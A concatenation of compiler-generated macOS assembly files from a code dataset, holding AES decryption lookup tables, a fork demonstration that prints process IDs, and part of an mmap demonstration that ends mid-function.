.long 377642221 ## 0x16825ced
.long 3474729866 ## 0xcf1c2b8a
.long 2041877159 ## 0x79b492a7
.long 133361907 ## 0x7f2f0f3
.long 1776460110 ## 0x69e2a14e
.long 3673476453 ## 0xdaf4cd65
.long 96392454 ## 0x5bed506
.long 878845905 ## 0x34621fd1
.long 2801699524 ## 0xa6fe8ac4
.long 777231668 ## 0x2e539d34
.long 4082475170 ## 0xf355a0a2
.long 2330014213 ## 0x8ae13205
.long 4142626212 ## 0xf6eb75a4
.long 2213296395 ## 0x83ec390b
.long 1626319424 ## 0x60efaa40
.long 1906247262 ## 0x719f065e
.long 1846563261 ## 0x6e1051bd
.long 562755902 ## 0x218af93e
.long 3708173718 ## 0xdd063d96
.long 1040559837 ## 0x3e05aedd
.long 3871163981 ## 0xe6bd464d
.long 1418573201 ## 0x548db591
.long 3294430577 ## 0xc45d0571
.long 114585348 ## 0x6d46f04
.long 1343618912 ## 0x5015ff60
.long 2566595609 ## 0x98fb2419
.long 3186202582 ## 0xbde997d6
.long 1078185097 ## 0x4043cc89
.long 3651041127 ## 0xd99e7767
.long 3896688048 ## 0xe842bdb0
.long 2307622919 ## 0x898b8807
.long 425408743 ## 0x195b38e7
.long 3371096953 ## 0xc8eedb79
.long 2081048481 ## 0x7c0a47a1
.long 1108339068 ## 0x420fe97c
.long 2216610296 ## 0x841ec9f8
.long 0 ## 0x0
.long 2156299017 ## 0x80868309
.long 736970802 ## 0x2bed4832
.long 292596766 ## 0x1170ac1e
.long 1517440620 ## 0x5a724e6c
.long 251657213 ## 0xefffbfd
.long 2235061775 ## 0x8538560f
.long 2933202493 ## 0xaed51e3d
.long 758720310 ## 0x2d392736
.long 265905162 ## 0xfd9640a
.long 1554391400 ## 0x5ca62168
.long 1532285339 ## 0x5b54d19b
.long 908999204 ## 0x362e3a24
.long 174567692 ## 0xa67b10c
.long 1474760595 ## 0x57e70f93
.long 4002861748 ## 0xee96d2b4
.long 2610011675 ## 0x9b919e1b
.long 3234156416 ## 0xc0c54f80
.long 3693126241 ## 0xdc20a261
.long 2001430874 ## 0x774b695a
.long 303699484 ## 0x121a161c
.long 2478443234 ## 0x93ba0ae2
.long 2687165888 ## 0xa02ae5c0
.long 585122620 ## 0x22e0433c
.long 454499602 ## 0x1b171d12
.long 151849742 ## 0x90d0b0e
.long 2345119218 ## 0x8bc7adf2
.long 3064510765 ## 0xb6a8b92d
.long 514443284 ## 0x1ea9c814
.long 4044981591 ## 0xf1198557
.long 1963412655 ## 0x75074caf
.long 2581445614 ## 0x99ddbbee
.long 2137062819 ## 0x7f60fda3
.long 19308535 ## 0x1269ff7
.long 1928707164 ## 0x72f5bc5c
.long 1715193156 ## 0x663bc544
.long 4219352155 ## 0xfb7e345b
.long 1126790795 ## 0x4329768b
.long 600235211 ## 0x23c6dccb
.long 3992742070 ## 0xedfc68b6
.long 3841024952 ## 0xe4f163b8
.long 836553431 ## 0x31dccad7
.long 1669664834 ## 0x63851042
.long 2535604243 ## 0x97224013
.long 3323011204 ## 0xc6112084
.long 1243905413 ## 0x4a247d85
.long 3141400786 ## 0xbb3df8d2
.long 4180808110 ## 0xf93211ae
.long 698445255 ## 0x29a16dc7
.long 2653899549 ## 0x9e2f4b1d
.long 2989552604 ## 0xb230f3dc
.long 2253581325 ## 0x8652ec0d
.long 3252932727 ## 0xc1e3d077
.long 3004591147 ## 0xb3166c2b
.long 1891211689 ## 0x70b999a9
.long 2487810577 ## 0x9448fa11
.long 3915653703 ## 0xe9642247
.long 4237083816 ## 0xfc8cc4a8
.long 4030667424 ## 0xf03f1aa0
.long 2100090966 ## 0x7d2cd856
.long 865136418 ## 0x3390ef22
.long 1229899655 ## 0x494ec787
.long 953270745 ## 0x38d1c1d9
.long 3399679628 ## 0xcaa2fe8c
.long 3557504664 ## 0xd40b3698
.long 4118925222 ## 0xf581cfa6
.long 2061379749 ## 0x7ade28a5
.long 3079546586 ## 0xb78e26da
.long 2915017791 ## 0xadbfa43f
.long 983426092 ## 0x3a9de42c
.long 2022837584 ## 0x78920d50
.long 1607244650 ## 0x5fcc9b6a
.long 2118541908 ## 0x7e466254
.long 2366882550 ## 0x8d13c2f6
.long 3635996816 ## 0xd8b8e890
.long 972512814 ## 0x39f75e2e
.long 3283088770 ## 0xc3aff582
.long 1568718495 ## 0x5d80be9f
.long 3499326569 ## 0xd0937c69
.long 3576539503 ## 0xd52da96f
.long 621982671 ## 0x2512b3cf
.long 2895723464 ## 0xac993bc8
.long 410887952 ## 0x187da710
.long 2623762152 ## 0x9c636ee8
.long 1002142683 ## 0x3bbb7bdb
.long 645401037 ## 0x267809cd
.long 1494807662 ## 0x5918f46e
.long 2595684844 ## 0x9ab701ec
.long 1335535747 ## 0x4f9aa883
.long 2507040230 ## 0x956e65e6
.long 4293295786 ## 0xffe67eaa
.long 3167684641 ## 0xbccf0821
.long 367585007 ## 0x15e8e6ef
.long 3885750714 ## 0xe79bd9ba
.long 1865862730 ## 0x6f36ce4a
.long 2668221674 ## 0x9f09d4ea
.long 2960971305 ## 0xb07cd629
.long 2763173681 ## 0xa4b2af31
.long 1059270954 ## 0x3f23312a
.long 2777952454 ## 0xa59430c6
.long 2724642869 ## 0xa266c035
.long 1320957812 ## 0x4ebc3774
.long 2194319100 ## 0x82caa6fc
.long 2429595872 ## 0x90d0b0e0
.long 2815956275 ## 0xa7d81533
.long 77089521 ## 0x4984af1
.long 3973773121 ## 0xecdaf741
.long 3444575871 ## 0xcd500e7f
.long 2448830231 ## 0x91f62f17
.long 1305906550 ## 0x4dd68d76
.long 4021308739 ## 0xefb04d43
.long 2857194700 ## 0xaa4d54cc
.long 2516901860 ## 0x9604dfe4
.long 3518358430 ## 0xd1b5e39e
.long 1787304780 ## 0x6a881b4c
.long 740276417 ## 0x2c1fb8c1
.long 1699839814 ## 0x65517f46
.long 1592394909 ## 0x5eea049d
.long 2352307457 ## 0x8c355d01
.long 2272556026 ## 0x877473fa
.long 188821243 ## 0xb412efb
.long 1729977011 ## 0x671d5ab3
.long 3687994002 ## 0xdbd25292
.long 274084841 ## 0x105633e9
.long 3594982253 ## 0xd647136d
.long 3613494426 ## 0xd7618c9a
.long 2701949495 ## 0xa10c7a37
.long 4162096729 ## 0xf8148e59
.long 322734571 ## 0x133c89eb
.long 2837966542 ## 0xa927eece
.long 1640576439 ## 0x61c935b7
.long 484830689 ## 0x1ce5ede1
.long 1202797690 ## 0x47b13c7a
.long 3537852828 ## 0xd2df599c
.long 4067639125 ## 0xf2733f55
.long 349075736 ## 0x14ce7918
.long 3342319475 ## 0xc737bf73
.long 4157467219 ## 0xf7cdea53
.long 4255800159 ## 0xfdaa5b5f
.long 1030690015 ## 0x3d6f14df
.long 1155237496 ## 0x44db8678
.long 2951971274 ## 0xaff381ca
.long 1757691577 ## 0x68c43eb9
.long 607398968 ## 0x24342c38
.long 2738905026 ## 0xa3405fc2
.long 499347990 ## 0x1dc37216
.long 3794078908 ## 0xe2250cbc
.long 1011452712 ## 0x3c498b28
.long 227885567 ## 0xd9541ff
.long 2818666809 ## 0xa8017139
.long 213114376 ## 0xcb3de08
.long 3034881240 ## 0xb4e49cd8
.long 1455525988 ## 0x56c19064
.long 3414450555 ## 0xcb84617b
.long 850817237 ## 0x32b670d5
.long 1817998408 ## 0x6c5c7448
.long 3092726480 ## 0xb85742d0
.p2align 4 ## @Td4
_Td4:
.long 1381126738 ## 0x52525252
.long 151587081 ## 0x9090909
.long 1785358954 ## 0x6a6a6a6a
.long 3587560917 ## 0xd5d5d5d5
.long 808464432 ## 0x30303030
.long 909522486 ## 0x36363636
.long 2779096485 ## 0xa5a5a5a5
.long 943208504 ## 0x38383838
.long 3217014719 ## 0xbfbfbfbf
.long 1077952576 ## 0x40404040
.long 2745410467 ## 0xa3a3a3a3
.long 2661195422 ## 0x9e9e9e9e
.long 2172748161 ## 0x81818181
.long 4092851187 ## 0xf3f3f3f3
.long 3621246935 ## 0xd7d7d7d7
.long 4227595259 ## 0xfbfbfbfb
.long 2088533116 ## 0x7c7c7c7c
.long 3823363043 ## 0xe3e3e3e3
.long 960051513 ## 0x39393939
.long 2189591170 ## 0x82828282
.long 2610666395 ## 0x9b9b9b9b
.long 791621423 ## 0x2f2f2f2f
.long 4294967295 ## 0xffffffff
.long 2273806215 ## 0x87878787
.long 875836468 ## 0x34343434
.long 2391707278 ## 0x8e8e8e8e
.long 1128481603 ## 0x43434343
.long 1145324612 ## 0x44444444
.long 3301229764 ## 0xc4c4c4c4
.long 3739147998 ## 0xdededede
.long 3924421097 ## 0xe9e9e9e9
.long 3419130827 ## 0xcbcbcbcb
.long 1414812756 ## 0x54545454
.long 2071690107 ## 0x7b7b7b7b
.long 2492765332 ## 0x94949494
.long 842150450 ## 0x32323232
.long 2795939494 ## 0xa6a6a6a6
.long 3267543746 ## 0xc2c2c2c2
.long 589505315 ## 0x23232323
.long 1027423549 ## 0x3d3d3d3d
.long 4008636142 ## 0xeeeeeeee
.long 1280068684 ## 0x4c4c4c4c
.long 2509608341 ## 0x95959595
.long 185273099 ## 0xb0b0b0b
.long 1111638594 ## 0x42424242
.long 4210752250 ## 0xfafafafa
.long 3284386755 ## 0xc3c3c3c3
.long 1313754702 ## 0x4e4e4e4e
.long 134744072 ## 0x8080808
.long 774778414 ## 0x2e2e2e2e
.long 2711724449 ## 0xa1a1a1a1
.long 1717986918 ## 0x66666666
.long 673720360 ## 0x28282828
.long 3654932953 ## 0xd9d9d9d9
.long 606348324 ## 0x24242424
.long 2998055602 ## 0xb2b2b2b2
.long 1987475062 ## 0x76767676
.long 1532713819 ## 0x5b5b5b5b
.long 2728567458 ## 0xa2a2a2a2
.long 1229539657 ## 0x49494949
.long 1835887981 ## 0x6d6d6d6d
.long 2341178251 ## 0x8b8b8b8b
.long 3520188881 ## 0xd1d1d1d1
.long 623191333 ## 0x25252525
.long 1920103026 ## 0x72727272
.long 4177066232 ## 0xf8f8f8f8
.long 4143380214 ## 0xf6f6f6f6
.long 1684300900 ## 0x64646464
.long 2256963206 ## 0x86868686
.long 1751672936 ## 0x68686868
.long 2560137368 ## 0x98989898
.long 370546198 ## 0x16161616
.long 3570717908 ## 0xd4d4d4d4
.long 2762253476 ## 0xa4a4a4a4
.long 1549556828 ## 0x5c5c5c5c
.long 3435973836 ## 0xcccccccc
.long 1566399837 ## 0x5d5d5d5d
.long 1701143909 ## 0x65656565
.long 3065427638 ## 0xb6b6b6b6
.long 2459079314 ## 0x92929292
.long 1819044972 ## 0x6c6c6c6c
.long 1886417008 ## 0x70707070
.long 1212696648 ## 0x48484848
.long 1347440720 ## 0x50505050
.long 4261281277 ## 0xfdfdfdfd
.long 3991793133 ## 0xedededed
.long 3115956665 ## 0xb9b9b9b9
.long 3671775962 ## 0xdadadada
.long 1583242846 ## 0x5e5e5e5e
.long 353703189 ## 0x15151515
.long 1179010630 ## 0x46464646
.long 1465341783 ## 0x57575757
.long 2812782503 ## 0xa7a7a7a7
.long 2374864269 ## 0x8d8d8d8d
.long 2644352413 ## 0x9d9d9d9d
.long 2223277188 ## 0x84848484
.long 2425393296 ## 0x90909090
.long 3638089944 ## 0xd8d8d8d8
.long 2880154539 ## 0xabababab
.long 0 ## 0x0
.long 2358021260 ## 0x8c8c8c8c
.long 3166485692 ## 0xbcbcbcbc
.long 3553874899 ## 0xd3d3d3d3
.long 168430090 ## 0xa0a0a0a
.long 4160223223 ## 0xf7f7f7f7
.long 3840206052 ## 0xe4e4e4e4
.long 1482184792 ## 0x58585858
.long 84215045 ## 0x5050505
.long 3099113656 ## 0xb8b8b8b8
.long 3014898611 ## 0xb3b3b3b3
.long 1162167621 ## 0x45454545
.long 101058054 ## 0x6060606
.long 3503345872 ## 0xd0d0d0d0
.long 741092396 ## 0x2c2c2c2c
.long 505290270 ## 0x1e1e1e1e
.long 2408550287 ## 0x8f8f8f8f
.long 3402287818 ## 0xcacacaca
.long 1061109567 ## 0x3f3f3f3f
.long 252645135 ## 0xf0f0f0f
.long 33686018 ## 0x2020202
.long 3250700737 ## 0xc1c1c1c1
.long 2947526575 ## 0xafafafaf
.long 3183328701 ## 0xbdbdbdbd
.long 50529027 ## 0x3030303
.long 16843009 ## 0x1010101
.long 320017171 ## 0x13131313
.long 2324335242 ## 0x8a8a8a8a
.long 1802201963 ## 0x6b6b6b6b
.long 976894522 ## 0x3a3a3a3a
.long 2442236305 ## 0x91919191
.long 286331153 ## 0x11111111
.long 1094795585 ## 0x41414141
.long 1330597711 ## 0x4f4f4f4f
.long 1734829927 ## 0x67676767
.long 3705461980 ## 0xdcdcdcdc
.long 3941264106 ## 0xeaeaeaea
.long 2543294359 ## 0x97979797
.long 4076008178 ## 0xf2f2f2f2
.long 3486502863 ## 0xcfcfcfcf
.long 3469659854 ## 0xcececece
.long 4042322160 ## 0xf0f0f0f0
.long 3031741620 ## 0xb4b4b4b4
.long 3873892070 ## 0xe6e6e6e6
.long 1936946035 ## 0x73737373
.long 2526451350 ## 0x96969696
.long 2896997548 ## 0xacacacac
.long 1953789044 ## 0x74747474
.long 572662306 ## 0x22222222
.long 3890735079 ## 0xe7e7e7e7
.long 2913840557 ## 0xadadadad
.long 892679477 ## 0x35353535
.long 2240120197 ## 0x85858585
.long 3806520034 ## 0xe2e2e2e2
.long 4193909241 ## 0xf9f9f9f9
.long 926365495 ## 0x37373737
.long 3907578088 ## 0xe8e8e8e8
.long 471604252 ## 0x1c1c1c1c
.long 1970632053 ## 0x75757575
.long 3755991007 ## 0xdfdfdfdf
.long 1852730990 ## 0x6e6e6e6e
.long 1195853639 ## 0x47474747
.long 4059165169 ## 0xf1f1f1f1
.long 437918234 ## 0x1a1a1a1a
.long 1903260017 ## 0x71717171
.long 488447261 ## 0x1d1d1d1d
.long 690563369 ## 0x29292929
.long 3318072773 ## 0xc5c5c5c5
.long 2307492233 ## 0x89898989
.long 1869573999 ## 0x6f6f6f6f
.long 3082270647 ## 0xb7b7b7b7
.long 1650614882 ## 0x62626262
.long 235802126 ## 0xe0e0e0e
.long 2863311530 ## 0xaaaaaaaa
.long 404232216 ## 0x18181818
.long 3200171710 ## 0xbebebebe
.long 454761243 ## 0x1b1b1b1b
.long 4244438268 ## 0xfcfcfcfc
.long 1448498774 ## 0x56565656
.long 1044266558 ## 0x3e3e3e3e
.long 1263225675 ## 0x4b4b4b4b
.long 3334915782 ## 0xc6c6c6c6
.long 3537031890 ## 0xd2d2d2d2
.long 2038004089 ## 0x79797979
.long 538976288 ## 0x20202020
.long 2593823386 ## 0x9a9a9a9a
.long 3688618971 ## 0xdbdbdbdb
.long 3233857728 ## 0xc0c0c0c0
.long 4278124286 ## 0xfefefefe
.long 2021161080 ## 0x78787878
.long 3452816845 ## 0xcdcdcdcd
.long 1515870810 ## 0x5a5a5a5a
.long 4109694196 ## 0xf4f4f4f4
.long 522133279 ## 0x1f1f1f1f
.long 3722304989 ## 0xdddddddd
.long 2829625512 ## 0xa8a8a8a8
.long 858993459 ## 0x33333333
.long 2290649224 ## 0x88888888
.long 117901063 ## 0x7070707
.long 3351758791 ## 0xc7c7c7c7
.long 825307441 ## 0x31313131
.long 2981212593 ## 0xb1b1b1b1
.long 303174162 ## 0x12121212
.long 269488144 ## 0x10101010
.long 1499027801 ## 0x59595959
.long 656877351 ## 0x27272727
.long 2155905152 ## 0x80808080
.long 3974950124 ## 0xecececec
.long 1600085855 ## 0x5f5f5f5f
.long 1616928864 ## 0x60606060
.long 1364283729 ## 0x51515151
.long 2139062143 ## 0x7f7f7f7f
.long 2846468521 ## 0xa9a9a9a9
.long 421075225 ## 0x19191919
.long 3048584629 ## 0xb5b5b5b5
.long 1246382666 ## 0x4a4a4a4a
.long 218959117 ## 0xd0d0d0d
.long 757935405 ## 0x2d2d2d2d
.long 3857049061 ## 0xe5e5e5e5
.long 2054847098 ## 0x7a7a7a7a
.long 2678038431 ## 0x9f9f9f9f
.long 2475922323 ## 0x93939393
.long 3385444809 ## 0xc9c9c9c9
.long 2627509404 ## 0x9c9c9c9c
.long 4025479151 ## 0xefefefef
.long 2694881440 ## 0xa0a0a0a0
.long 3772834016 ## 0xe0e0e0e0
.long 993737531 ## 0x3b3b3b3b
.long 1296911693 ## 0x4d4d4d4d
.long 2930683566 ## 0xaeaeaeae
.long 707406378 ## 0x2a2a2a2a
.long 4126537205 ## 0xf5f5f5f5
.long 2964369584 ## 0xb0b0b0b0
.long 3368601800 ## 0xc8c8c8c8
.long 3958107115 ## 0xebebebeb
.long 3149642683 ## 0xbbbbbbbb
.long 1010580540 ## 0x3c3c3c3c
.long 2206434179 ## 0x83838383
.long 1397969747 ## 0x53535353
.long 2576980377 ## 0x99999999
.long 1633771873 ## 0x61616161
.long 387389207 ## 0x17171717
.long 724249387 ## 0x2b2b2b2b
.long 67372036 ## 0x4040404
.long 2122219134 ## 0x7e7e7e7e
.long 3132799674 ## 0xbabababa
.long 2004318071 ## 0x77777777
.long 3604403926 ## 0xd6d6d6d6
.long 640034342 ## 0x26262626
.long 3789677025 ## 0xe1e1e1e1
.long 1768515945 ## 0x69696969
.long 336860180 ## 0x14141414
.long 1667457891 ## 0x63636363
.long 1431655765 ## 0x55555555
.long 555819297 ## 0x21212121
.long 202116108 ## 0xc0c0c0c
.long 2105376125 ## 0x7d7d7d7d
.p2align 4 ## @rcon
_rcon:
.long 16777216 ## 0x1000000
.long 33554432 ## 0x2000000
.long 67108864 ## 0x4000000
.long 134217728 ## 0x8000000
.long 268435456 ## 0x10000000
.long 536870912 ## 0x20000000
.long 1073741824 ## 0x40000000
.long 2147483648 ## 0x80000000
.long 452984832 ## 0x1b000000
.long 905969664 ## 0x36000000
.subsections_via_symbols
| the_stack_data/242329633.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
bl _getpid
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
bl _fork
str w0, [sp, #8]
adds w8, w0, #1
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _perror
mov w8, #1
stur w8, [x29, #-4]
b LBB0_9
LBB0_2:
ldr w8, [sp, #8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
mov w0, #0
bl _exit
LBB0_4:
ldr w8, [sp, #8]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
ldr w9, [sp, #8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
mov w0, #120
bl _sleep
b LBB0_7
LBB0_6:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _fprintf
mov w8, #1
stur w8, [x29, #-4]
b LBB0_9
LBB0_7:
b LBB0_8
LBB0_8:
stur wzr, [x29, #-4]
b LBB0_9
LBB0_9:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "My PID is %d\n"
l_.str.1: ; @.str.1
.asciz "Can't fork"
l_.str.2: ; @.str.2
.asciz "Hello and goodbye from the child!\n"
l_.str.3: ; @.str.3
.asciz "Hello from the parent process! My child had PID %d\n"
l_.str.4: ; @.str.4
.asciz "Something went wrong forking\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
callq _getpid
movl %eax, %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
callq _fork
movl %eax, -8(%rbp)
cmpl $-1, %eax
jne LBB0_2
## %bb.1:
leaq L_.str.1(%rip), %rdi
callq _perror
movl $1, -4(%rbp)
jmp LBB0_9
LBB0_2:
cmpl $0, -8(%rbp)
jne LBB0_4
## %bb.3:
leaq L_.str.2(%rip), %rdi
xorl %eax, %eax
movl %eax, -12(%rbp) ## 4-byte Spill
callq _printf
movl -12(%rbp), %edi ## 4-byte Reload
callq _exit
LBB0_4:
cmpl $0, -8(%rbp)
jle LBB0_6
## %bb.5:
movl -8(%rbp), %esi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
movl $120, %edi
callq _sleep
jmp LBB0_7
LBB0_6:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.4(%rip), %rsi
movb $0, %al
callq _fprintf
movl $1, -4(%rbp)
jmp LBB0_9
LBB0_7:
jmp LBB0_8
LBB0_8:
movl $0, -4(%rbp)
LBB0_9:
movl -4(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "My PID is %d\n"
L_.str.1: ## @.str.1
.asciz "Can't fork"
L_.str.2: ## @.str.2
.asciz "Hello and goodbye from the child!\n"
L_.str.3: ## @.str.3
.asciz "Hello from the parent process! My child had PID %d\n"
L_.str.4: ## @.str.4
.asciz "Something went wrong forking\n"
.subsections_via_symbols
| the_stack_data/218700.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _show ; -- Begin function show
.p2align 2
_show: ; @show
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
ldur x8, [x29, #-8]
ldrsb w17, [x8]
ldur x8, [x29, #-8]
ldrsb w16, [x8, #1]
ldur x8, [x29, #-8]
ldrsb w15, [x8, #2]
ldur x8, [x29, #-8]
ldrsb w14, [x8, #3]
ldur x8, [x29, #-8]
ldrsb w13, [x8, #4]
ldur x8, [x29, #-8]
ldrsb w12, [x8, #5]
ldur x8, [x29, #-8]
ldrsb w11, [x8, #6]
ldur x8, [x29, #-8]
ldrsb w10, [x8, #7]
mov x9, sp
; implicit-def: $x8
mov x8, x17
str x8, [x9]
; implicit-def: $x8
mov x8, x16
str x8, [x9, #8]
; implicit-def: $x8
mov x8, x15
str x8, [x9, #16]
; implicit-def: $x8
mov x8, x14
str x8, [x9, #24]
; implicit-def: $x8
mov x8, x13
str x8, [x9, #32]
; implicit-def: $x8
mov x8, x12
str x8, [x9, #40]
; implicit-def: $x8
mov x8, x11
str x8, [x9, #48]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #56]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #1200
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
mov w8, #0
str w8, [sp, #52] ; 4-byte Folded Spill
str wzr, [sp, #100]
str w0, [sp, #96]
str x1, [sp, #88]
bl _getpid
ldr w1, [sp, #52] ; 4-byte Folded Reload
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
add x0, sp, #104
mov x2, #64
adrp x3, l_.str.1@PAGE
add x3, x3, l_.str.1@PAGEOFF
bl ___sprintf_chk
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
mov w1, #514
bl _open
str w0, [sp, #84]
add x0, sp, #168
mov w1, #48
mov x2, #1024
bl _memset
str wzr, [sp, #80]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #80]
; kill: def $x8 killed $w8
subs x8, x8, #8
cset w8, hs
tbnz w8, #0, LBB1_4
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldr w0, [sp, #84]
add x1, sp, #168
mov x2, #1024
bl _write
b LBB1_3
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #80]
add w8, w8, #1
str w8, [sp, #80]
b LBB1_1
LBB1_4:
add x0, sp, #104
bl _system
ldr w4, [sp, #84]
mov x0, #0
mov x1, #8192
mov w2, #3
mov w3, #1
mov x5, #0
bl _mmap
str x0, [sp, #72]
ldr x8, [sp, #72]
adds x8, x8, #1
cset w9, eq
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_6
b LBB1_5
LBB1_5:
adrp x0, l___func__.main@PAGE
add x0, x0, l___func__.main@PAGEOFF
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
mov w2, #36
adrp x3, l_.str.4@PAGE
add x3, x3, l_.str.4@PAGEOFF
bl ___assert_rtn
LBB1_6:
b LBB1_7
LBB1_7:
ldr w4, [sp, #84]
mov x0, #0
mov x1, #8192
mov w2, #3
mov w3, #1
mov x5, #0
bl _mmap
str x0, [sp, #64]
ldr x8, [sp, #64]
adds x8, x8, #1
cset w9, eq
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_9
b LBB1_8
LBB1_8:
adrp x0, l___func__.main@PAGE
add x0, x0, l___func__.main@PAGEOFF
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
mov w2, #38
adrp x3, l_.str.5@PAGE
add x3, x3, l_.str.5@PAGEOFF
bl ___assert_rtn
LBB1_9:
b LBB1_10
LBB1_10:
ldr w4, [sp, #84]
mov x0, #0
mov x1, #8192
mov w2, #3
mov w3, #1
mov x5, #0
bl _mmap
str x0, [sp, #56]
ldr x8, [sp, #56]
adds x8, x8, #1
cset w9, eq
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_12
b LBB1_11
LBB1_11:
adrp x0, l___func__.main@PAGE
add x0, x0, l___func__.main@PAGEOFF
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
mov w2, #40
adrp x3, l_.str.6@PAGE
add x3, x3, l_.str.6@PAGEOFF
bl ___assert_rtn
LBB1_12:
b LBB1_13
LBB1_13:
add x0, sp, #104
str x0, [sp, #8] ; 8-byte Folded Spill
bl _system
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _unlink
ldr x0, [sp, #8] ; 8-byte Folded Reload
bl _system
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
bl _printf
ldr x0, [sp, #72]
adrp x1, l_.str.8@PAGE
add x1, x1, l_.str.8@PAGEOFF
mov x2, #4
str x2, [sp, #16] ; 8-byte Folded Spill
mov x3, #-1
str x3, [sp, #24] ; 8-byte Folded Spill
bl ___memcpy_chk
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
bl _printf
ldr x2, [sp, #16] ; 8-byte Folded Reload
ldr x3, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #64]
add x0, x8, #4
adrp x1, l_.str.10@PAGE
add x1, x1, l_.str.10@PAGEOFF
bl ___memcpy_chk
adrp x0, l_.str.11@PAGE
add x0, x0, l_.str.11@PAGEOFF
bl _printf
ldr x0, [sp, #72]
bl _show
adrp x0, l_.str.12@PAGE
add x0, x0, l_.str.12@PAGEOFF
str x0, [sp, #32] ; 8-byte Folded Spill
bl _printf
adrp x0, l_.str.13@PAGE
add x0, x0, l_.str.13@PAGEOFF
bl _printf
ldr x0, [sp, #64]
bl _show
ldr x0, [sp, #32] ; 8-byte Folded Reload
bl _printf
adrp x0, l_.str.14@PAGE
add x0, x0, l_.str.14@PAGEOFF
bl _printf
ldr x0, [sp, #56]
bl _show
ldr x0, [sp, #32] ; 8-byte Folded Reload
bl _printf
ldr x0, [sp, #72]
mov x1, #8192
str x1, [sp, #40] ; 8-byte Folded Spill
bl _munmap
ldr x1, [sp, #40] ; 8-byte Folded Reload
ldr x0, [sp, #64]
bl _munmap
ldr x1, [sp, #40] ; 8-byte Folded Reload
ldr x0, [sp, #56]
bl _munmap
ldr w0, [sp, #84]
bl _close
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB1_15
b LBB1_14
LBB1_14:
